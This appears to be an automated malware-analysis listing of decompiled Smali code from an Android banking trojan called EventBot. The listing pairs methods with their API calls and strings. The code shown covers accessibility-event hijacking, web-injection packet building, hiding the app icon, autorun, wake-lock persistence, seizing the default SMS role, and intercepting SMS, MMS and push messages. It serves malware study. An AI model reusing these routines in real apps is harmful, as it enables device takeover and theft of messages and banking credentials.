                        21if-ne v0, v1, :cond_23
                        22const/4 v0, 0x0
                        23iput-object v0, p0, Lcom/lib;->webInjCurrentApp:Ljava/lang/String;
                        25invoke-virtual {p2}, Landroid/app/Activity;->finish()V
                        26cond_23: return-void
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Integer.intValue
                        • android.app.Activity.finish
                        Strings
                        • [func] [activity] [onStop]
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Ljava/lang/StringBuilder;
                        3invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        5const-string v1, "[func] [activity] [onStop] "
                        7invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        8move-result-object v0
                        10invoke-virtual {v0, p5}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        11move-result-object v0
                        13invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        14move-result-object v0
                        16invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        18invoke-virtual {p5}, Ljava/lang/Integer;->intValue()I
                        19move-result v0
                        20const/4 v1, 0x6
                        21if-ne v0, v1, :cond_23
                        22const/4 v0, 0x0
                        23iput-object v0, p0, Lcom/lib;->webInjCurrentApp:Ljava/lang/String;
                        25invoke-virtual {p2}, Landroid/app/Activity;->finish()V
                        26cond_23: return-void
                        APIs
                        • com.example.eventbot.events.context:Landroid/content/Context
                        • android.content.Intent.<init>
                        • android.content.Context.startService
                        • com.example.eventbot.events.onAccessibilityEventFired:Ljava/util/concurrent/Semaphore
                        • java.util.concurrent.Semaphore.acquire
                        • android.view.accessibility.AccessibilityEvent.getPackageName
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • com.example.eventbot.events.injectEventQueue:Ljava/util/concurrent/BlockingQueue
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • com.example.eventbot.events.injectEventQueue:Ljava/util/concurrent/BlockingQueue
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • android.view.accessibility.AccessibilityEvent.obtain
                        • java.util.concurrent.BlockingQueue.put
                        • com.example.eventbot.events.onAccessibilityEventFired:Ljava/util/concurrent/Semaphore
                        • java.util.concurrent.Semaphore.release
                        • com.example.eventbot.events.onAccessibilityEventFired:Ljava/util/concurrent/Semaphore
                        • java.util.concurrent.Semaphore.release
                        Position Instruction Meta Information
                        0sget-boolean v0, Lcom/example/eventbot/service;->isRunning:Z
                        1if-nez v0, :cond_10
                        3sget-object v0, Lcom/example/eventbot/events;->context:Landroid/content/Context;
                        4new-instance v1, Landroid/content/Intent;
                        5const-class v2, Lcom/example/eventbot/service;
                        7invoke-direct {v1, v0, v2}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
                        9invoke-virtual {v0, v1}, Landroid/content/Context;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
                        10cond_10:
                        11sget-object v0, Lcom/example/eventbot/events;->onAccessibilityEventFired:Ljava/util/concurrent/Semaphore;
                        13invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->acquire()V
                        14try_end_15:
                        15invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getPackageName()Ljava/lang/CharSequence;
                        16move-result-object v0
                        17if-eqz v0, :cond_3a
                        19sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        20if-eqz v0, :cond_3a
                        22sget-object v0, Lcom/example/eventbot/events;->injectEventQueue:Ljava/util/concurrent/BlockingQueue;
                        23if-nez v0, :cond_2b
                        25sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        27invoke-interface {v0}, Lcom/libInterface;->getInjectEventQueue()Ljava/util/concurrent/BlockingQueue;
                        28move-result-object v0
                        29sput-object v0, Lcom/example/eventbot/events;->injectEventQueue:Ljava/util/concurrent/BlockingQueue;
                        30cond_2b:
                        31sget-object v0, Lcom/example/eventbot/events;->injectEventQueue:Ljava/util/concurrent/BlockingQueue;
                        33sget-object v1, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        35invoke-static {p1}, Landroid/view/accessibility/AccessibilityEvent;->obtain(Landroid/view/accessibility/AccessibilityEvent;)Landroid/view/accessibility/AccessibilityEvent;
                        36move-result-object p1
                        38invoke-interface {v1, p1}, Lcom/libInterface;->getInjectEventClass(Landroid/view/accessibility/AccessibilityEvent;)Lcom/libInterface$injectEvent;
                        39move-result-object p1
                        41invoke-interface {v0, p1}, Ljava/util/concurrent/BlockingQueue;->put(Ljava/lang/Object;)V
                        42cond_3a:
                        43sget-object p1, Lcom/example/eventbot/events;->onAccessibilityEventFired:Ljava/util/concurrent/Semaphore;
                        45invoke-virtual {p1}, Ljava/util/concurrent/Semaphore;->release()V
                        46goto/16 :goto_47
                        47catchall_40: move-exception p1
                        49sget-object v0, Lcom/example/eventbot/events;->onAccessibilityEventFired:Ljava/util/concurrent/Semaphore;
                        51invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        52throw p1
                        53try_end_47: return-void
                        Cross References
                        APIs
                        • java.util.concurrent.Semaphore.acquire
                        • android.content.Context.getSharedPreferences
                        • android.content.SharedPreferences.edit
                        • android.content.SharedPreferences$Editor.clear
                        • android.content.SharedPreferences$Editor.commit
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3sget-object v1, Lcom/lib;->aSniffMutex:Ljava/util/concurrent/Semaphore;
                        5invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->acquire()V
                        6try_end_6: const/4 v1, 0x0
                        7try_start_7:
                        8invoke-virtual {p1, p2, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
                        9move-result-object v1
                        11invoke-interface {v1}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
                        12move-result-object v1
                        14invoke-interface {v1}, Landroid/content/SharedPreferences$Editor;->clear()Landroid/content/SharedPreferences$Editor;
                        15move-result-object v1
                        17invoke-interface {v1}, Landroid/content/SharedPreferences$Editor;->commit()Z
                        18try_end_16: move-result v0
                        19try_start_17:
                        20sget-object v1, Lcom/lib;->aSniffMutex:Ljava/util/concurrent/Semaphore;
                        22invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        23goto_1c: return v0
                        24catch_1d: move-exception v1
                        26sget-object v1, Lcom/lib;->aSniffMutex:Ljava/util/concurrent/Semaphore;
                        28invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        29goto/16 :goto_1c
                        30catch_24: move-exception v1
                        31goto/16 :goto_1c
                        32catchall_26: move-exception v1
                        34sget-object v2, Lcom/lib;->aSniffMutex:Ljava/util/concurrent/Semaphore;
                        36invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        37throw v1
                        APIs
                        • java.util.concurrent.Semaphore.acquire
                        • android.content.Context.getSharedPreferences
                        • android.content.SharedPreferences.edit
                        • android.content.SharedPreferences$Editor.clear
                        • android.content.SharedPreferences$Editor.commit
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3sget-object v1, Lcom/lib;->gateUrlsMutex:Ljava/util/concurrent/Semaphore;
                        5invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->acquire()V
                        6try_end_6: const/4 v1, 0x0
                        7try_start_7:
                        8invoke-virtual {p1, p2, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
                        9move-result-object v1
                        11invoke-interface {v1}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
                        12move-result-object v1
                        14invoke-interface {v1}, Landroid/content/SharedPreferences$Editor;->clear()Landroid/content/SharedPreferences$Editor;
                        15move-result-object v1
                        17invoke-interface {v1}, Landroid/content/SharedPreferences$Editor;->commit()Z
                        18try_end_16: move-result v0
                        19try_start_17:
                        20sget-object v1, Lcom/lib;->gateUrlsMutex:Ljava/util/concurrent/Semaphore;
                        22invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        23goto_1c: return v0
                        24catch_1d: move-exception v1
                        26sget-object v1, Lcom/lib;->gateUrlsMutex:Ljava/util/concurrent/Semaphore;
                        28invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        29goto/16 :goto_1c
                        30catch_24: move-exception v1
                        31goto/16 :goto_1c
                        32catchall_26: move-exception v1
                        34sget-object v2, Lcom/lib;->gateUrlsMutex:Ljava/util/concurrent/Semaphore;
                        36invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        37throw v1
                        Cross References
                        APIs
                        • java.util.concurrent.Semaphore.acquire
                        • android.content.Context.getSharedPreferences
                        • android.content.SharedPreferences.edit
                        • android.content.SharedPreferences$Editor.clear
                        • android.content.SharedPreferences$Editor.commit
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3sget-object v1, Lcom/lib;->pinnedMutex:Ljava/util/concurrent/Semaphore;
                        5invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->acquire()V
                        6try_end_6: const/4 v1, 0x0
                        7try_start_7:
                        8invoke-virtual {p1, p2, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
                        9move-result-object v1
                        11invoke-interface {v1}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
                        12move-result-object v1
                        14invoke-interface {v1}, Landroid/content/SharedPreferences$Editor;->clear()Landroid/content/SharedPreferences$Editor;
                        15move-result-object v1
                        17invoke-interface {v1}, Landroid/content/SharedPreferences$Editor;->commit()Z
                        18try_end_16: move-result v0
                        19try_start_17:
                        20sget-object v1, Lcom/lib;->pinnedMutex:Ljava/util/concurrent/Semaphore;
                        22invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        23goto_1c: return v0
                        24catch_1d: move-exception v1
                        26sget-object v1, Lcom/lib;->pinnedMutex:Ljava/util/concurrent/Semaphore;
                        28invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        29goto/16 :goto_1c
                        30catch_24: move-exception v1
                        31goto/16 :goto_1c
                        32catchall_26: move-exception v1
                        34sget-object v2, Lcom/lib;->pinnedMutex:Ljava/util/concurrent/Semaphore;
                        36invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        37throw v1
                        Cross References
                        APIs
                        • java.util.concurrent.Semaphore.acquire
                        • android.content.Context.getSharedPreferences
                        • android.content.SharedPreferences.edit
                        • android.content.SharedPreferences$Editor.clear
                        • android.content.SharedPreferences$Editor.commit
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3sget-object v1, Lcom/lib;->webMutex:Ljava/util/concurrent/Semaphore;
                        5invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->acquire()V
                        6try_end_6: const/4 v1, 0x0
                        7try_start_7:
                        8invoke-virtual {p1, p2, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
                        9move-result-object v1
                        11invoke-interface {v1}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
                        12move-result-object v1
                        14invoke-interface {v1}, Landroid/content/SharedPreferences$Editor;->clear()Landroid/content/SharedPreferences$Editor;
                        15move-result-object v1
                        17invoke-interface {v1}, Landroid/content/SharedPreferences$Editor;->commit()Z
                        18try_end_16: move-result v0
                        19try_start_17:
                        20sget-object v1, Lcom/lib;->webMutex:Ljava/util/concurrent/Semaphore;
                        22invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        23goto_1c: return v0
                        24catch_1d: move-exception v1
                        26sget-object v1, Lcom/lib;->webMutex:Ljava/util/concurrent/Semaphore;
                        28invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        29goto/16 :goto_1c
                        30catch_24: move-exception v1
                        31goto/16 :goto_1c
                        32catchall_26: move-exception v1
                        34sget-object v2, Lcom/lib;->webMutex:Ljava/util/concurrent/Semaphore;
                        36invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        37throw v1
                        Cross References
                        APIs
                        • java.util.concurrent.Semaphore.acquire
                        • android.content.Context.getSharedPreferences
                        • android.content.SharedPreferences.edit
                        • android.content.SharedPreferences$Editor.putBoolean
                        • android.content.SharedPreferences$Editor.commit
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3sget-object v1, Lcom/lib;->webMutex:Ljava/util/concurrent/Semaphore;
                        5invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->acquire()V
                        6try_end_6: const/4 v1, 0x0
                        7try_start_7:
                        8invoke-virtual {p1, p2, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
                        9move-result-object v1
                        11invoke-interface {v1}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
                        12move-result-object v1
                        14invoke-interface {v1, p3, p4}, Landroid/content/SharedPreferences$Editor;->putBoolean(Ljava/lang/String;Z)Landroid/content/SharedPreferences$Editor;
                        16invoke-interface {v1}, Landroid/content/SharedPreferences$Editor;->commit()Z
                        17try_end_15: move-result v0
                        18try_start_16:
                        19sget-object v1, Lcom/lib;->webMutex:Ljava/util/concurrent/Semaphore;
                        21invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        22goto_1b: return v0
                        23catch_1c: move-exception v1
                        25sget-object v1, Lcom/lib;->webMutex:Ljava/util/concurrent/Semaphore;
                        27invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        28goto/16 :goto_1b
                        29catch_23: move-exception v1
                        30goto/16 :goto_1b
                        31catchall_25: move-exception v1
                        33sget-object v2, Lcom/lib;->webMutex:Ljava/util/concurrent/Semaphore;
                        35invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        36throw v1
                        Cross References
                        APIs
                        • android.content.Context.getSystemService
                        • android.content.Context.getPackageName
                        • android.os.PowerManager.isIgnoringBatteryOptimizations
                        • android.os.PowerManager$WakeLock.isHeld
                        • android.net.wifi.WifiManager$WifiLock.isHeld
                        Strings
                        • power
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v1, 0x0
                        2sget v0, Landroid/os/Build$VERSION;->SDK_INT:I
                        3const/16 v2, 0x17
                        4if-lt v0, v2, :cond_20
                        6const-string v0, "power"
                        8invoke-virtual {p1, v0}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
                        9move-result-object v0
                        10check-cast v0, Landroid/os/PowerManager;
                        11if-eqz v0, :cond_3b
                        13invoke-virtual {p1}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
                        14move-result-object v2
                        16invoke-virtual {v0, v2}, Landroid/os/PowerManager;->isIgnoringBatteryOptimizations(Ljava/lang/String;)Z
                        17move-result v0
                        18if-eqz v0, :cond_3b
                        20invoke-virtual {p0, p1}, Lcom/lib;->setWakeLocks(Landroid/content/Context;)V
                        21const/4 v0, 0x1
                        22goto_1f: return v0
                        23cond_20:
                        24sget-object v0, Lcom/lib;->wifiLock:Landroid/net/wifi/WifiManager$WifiLock;
                        25if-eqz v0, :cond_36
                        27sget-object v0, Lcom/lib;->wakeLock:Landroid/os/PowerManager$WakeLock;
                        28if-eqz v0, :cond_36
                        30sget-object v0, Lcom/lib;->wakeLock:Landroid/os/PowerManager$WakeLock;
                        32invoke-virtual {v0}, Landroid/os/PowerManager$WakeLock;->isHeld()Z
                        33move-result v0
                        35sget-object v1, Lcom/lib;->wifiLock:Landroid/net/wifi/WifiManager$WifiLock;
                        37invoke-virtual {v1}, Landroid/net/wifi/WifiManager$WifiLock;->isHeld()Z
                        38move-result v1
                        39and-int/2addr v0, v1
                        40goto/16 :goto_1f
                        41cond_36:
                        42invoke-virtual {p0, p1}, Lcom/lib;->setWakeLocks(Landroid/content/Context;)V
                        43move v0, v1
                        44goto/16 :goto_1f
                        45cond_3b: move v0, v1
                        46goto/16 :goto_1f
                        APIs
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.util.Log.v
                        Strings
                        • [func] [service] [onStartCommand] T:
                        Position Instruction Meta Information
                        1sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        2if-eqz v0, :cond_32
                        3try_start_4:
                        4sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        6iget-object v1, p0, Lcom/example/eventbot/service$1;->this$0:Lcom/example/eventbot/service;
                        8invoke-interface {v0, v1}, Lcom/libInterface;->hideIcon(Landroid/content/Context;)Z
                        10sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        12invoke-interface {v0}, Lcom/libInterface;->doInjectThread()V
                        14sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        16invoke-interface {v0}, Lcom/libInterface;->doAutorun()V
                        18sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        20invoke-interface {v0}, Lcom/libInterface;->mainLoop()V
                        21try_end_1a: goto/16 :goto_32
                        22catchall_1b: move-exception v0
                        24sget-object v1, Lcom/example/eventbot/cfg;->TAG:Ljava/lang/String;
                        25new-instance v2, Ljava/lang/StringBuilder;
                        27invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        29const-string v3, "[func] [service] [onStartCommand] T: "
                        31invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        33invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        35invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        36move-result-object v0
                        38invoke-static {v1, v0}, Landroid/util/Log;->v(Ljava/lang/String;Ljava/lang/String;)I
                        39goto_32: return-void
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • smsPrefs
                        • [func] [startSmsAdmin] T:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3invoke-virtual {p0, p1}, Lcom/lib;->isSmsAdmin(Landroid/content/Context;)Z
                        4move-result v1
                        5if-nez v1, :cond_14
                        7const-string v1, "smsPrefs"
                        9invoke-virtual {p0, p1}, Lcom/lib;->getSmsAdmin(Landroid/content/Context;)Ljava/lang/String;
                        10move-result-object v2
                        12invoke-virtual {p0, p1, v1, v2}, Lcom/lib;->writeSystemSmsApp(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;)Z
                        14invoke-virtual {p0, p1}, Lcom/lib;->requestSmsAdmin(Landroid/content/Context;)V
                        15try_end_13: const/4 v0, 0x1
                        16goto_14: return v0
                        17catch_15: move-exception v1
                        18new-instance v2, Ljava/lang/StringBuilder;
                        20invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        22const-string v3, "[func] [startSmsAdmin] T: "
                        24invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        25move-result-object v2
                        27invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        28move-result-object v1
                        30invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        31move-result-object v1
                        33invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        34goto/16 :goto_14
                        APIs
                        • android.app.Service.onStartCommand
                        • android.util.Log.d
                        • com.example.eventbot.alarm.setAlarm
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • com.example.eventbot.service.stopSelf
                        • com.example.eventbot.service.runOnUiThread
                        Strings
                        • [func] [service] onStartCommand
                        Position Instruction Meta Information
                        1invoke-super {p0, p1, p2, p3}, Landroid/app/Service;->onStartCommand(Landroid/content/Intent;II)I
                        3sget-object p1, Lcom/example/eventbot/cfg;->TAG:Ljava/lang/String;
                        5const-string p2, "[func] [service] onStartCommand"
                        7invoke-static {p1, p2}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I
                        8sget-boolean p1, Lcom/example/eventbot/service;->isRunning:Z
                        9if-eqz p1, :cond_10
                        10const/4 p1, 0x2
                        11return p1
                        12cond_10: const-class p1, Lcom/example/eventbot/alarm;
                        14sget-object p2, Lcom/example/eventbot/cfg;->alarmDelay:Ljava/lang/Long;
                        16invoke-static {p0, p1, p2}, Lcom/example/eventbot/alarm;->setAlarm(Landroid/content/Context;Ljava/lang/Class;Ljava/lang/Long;)Z
                        18sget-object p1, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        19if-nez p1, :cond_1e
                        21invoke-virtual {p0}, Lcom/example/eventbot/service;->stopSelf()V
                        22cond_1e: const/4 p1, 0x1
                        23sput-boolean p1, Lcom/example/eventbot/service;->isRunning:Z
                        24new-instance p2, Lcom/example/eventbot/service$1;
                        26invoke-direct {p2, p0}, Lcom/example/eventbot/service$1;-><init>(Lcom/example/eventbot/service;)V
                        28invoke-direct {p0, p2}, Lcom/example/eventbot/service;->runOnUiThread(Ljava/lang/Runnable;)V
                        29return p1
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • ?
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1: new-instance v1, Ljava/lang/StringBuilder;
                        4invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        6invoke-virtual {p0, p1}, Lcom/lib;->pingAdmin(Landroid/content/Context;)Ljava/lang/String;
                        7move-result-object v2
                        9invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        10move-result-object v1
                        12const-string v2, "?"
                        14invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        15move-result-object v1
                        17invoke-virtual {p0, p1, p2, p3}, Lcom/lib;->makeWebInjPacket(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        18move-result-object v2
                        20invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        21move-result-object v1
                        23invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        24try_end_1f: move-result-object v0
                        25goto_20: return-object v0
                        26catch_21: move-exception v1
                        27goto/16 :goto_20
                        APIs
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • android.content.Intent.getAction
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        Strings
                        • [func] [msg] [recvLongMsg] [onReceive] :
                        Position Instruction Meta Information
                        0try_start_0:
                        1sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        2if-eqz v0, :cond_23
                        4sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        5new-instance v1, Ljava/lang/StringBuilder;
                        7invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        9const-string v2, "[func] [msg] [recvLongMsg] [onReceive] : "
                        11invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        13invoke-virtual {p2}, Landroid/content/Intent;->getAction()Ljava/lang/String;
                        14move-result-object v2
                        16invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        18invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        19move-result-object v1
                        21invoke-interface {v0, v1}, Lcom/libInterface;->printDebug(Ljava/lang/String;)V
                        23sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        25invoke-interface {v0, p1, p0, p2}, Lcom/libInterface;->doMMSthread(Landroid/content/Context;Landroid/content/BroadcastReceiver;Landroid/content/Intent;)V
                        26try_end_23: return-void
                        APIs
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • android.content.Intent.getAction
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        Strings
                        • [func] [msg] [recvPushMsg] [onReceive] :
                        Position Instruction Meta Information
                        0try_start_0:
                        1sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        2if-eqz v0, :cond_23
                        4sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        5new-instance v1, Ljava/lang/StringBuilder;
                        7invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        9const-string v2, "[func] [msg] [recvPushMsg] [onReceive] : "
                        11invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        13invoke-virtual {p2}, Landroid/content/Intent;->getAction()Ljava/lang/String;
                        14move-result-object v2
                        16invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        18invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        19move-result-object v1
                        21invoke-interface {v0, v1}, Lcom/libInterface;->printDebug(Ljava/lang/String;)V
                        23sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        25invoke-interface {v0, p1, p0, p2}, Lcom/libInterface;->doPUSHthread(Landroid/content/Context;Landroid/content/BroadcastReceiver;Landroid/content/Intent;)V
                        26try_end_23: return-void
                        APIs
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • android.content.Intent.getAction
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        Strings
                        • [func] [msg] [recvShotMsg] [onReceive] :
                        Position Instruction Meta Information
                        0try_start_0:
                        1sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        2if-eqz v0, :cond_23
                        4sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        5new-instance v1, Ljava/lang/StringBuilder;
                        7invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        9const-string v2, "[func] [msg] [recvShotMsg] [onReceive] : "
                        11invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        13invoke-virtual {p2}, Landroid/content/Intent;->getAction()Ljava/lang/String;
                        14move-result-object v2
                        16invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        18invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        19move-result-object v1
                        21invoke-interface {v0, v1}, Lcom/libInterface;->printDebug(Ljava/lang/String;)V
                        23sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        25invoke-interface {v0, p1, p0, p2}, Lcom/libInterface;->doSMSthread(Landroid/content/Context;Landroid/content/BroadcastReceiver;Landroid/content/Intent;)V
                        26try_end_23: return-void
                        APIs
                        • android.os.Parcel.dataPosition
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        Position Instruction Meta Information
                        0new-instance v0, Landroidx/versionedparcelable/VersionedParcelParcel;
                        2iget-object v1, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        4invoke-virtual {v1}, Landroid/os/Parcel;->dataPosition()I
                        5move-result v2
                        6iget v3, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mNextRead:I
                        7iget v4, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mOffset:I
                        8if-ne v3, v4, :cond_10
                        9iget v3, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mEnd:I
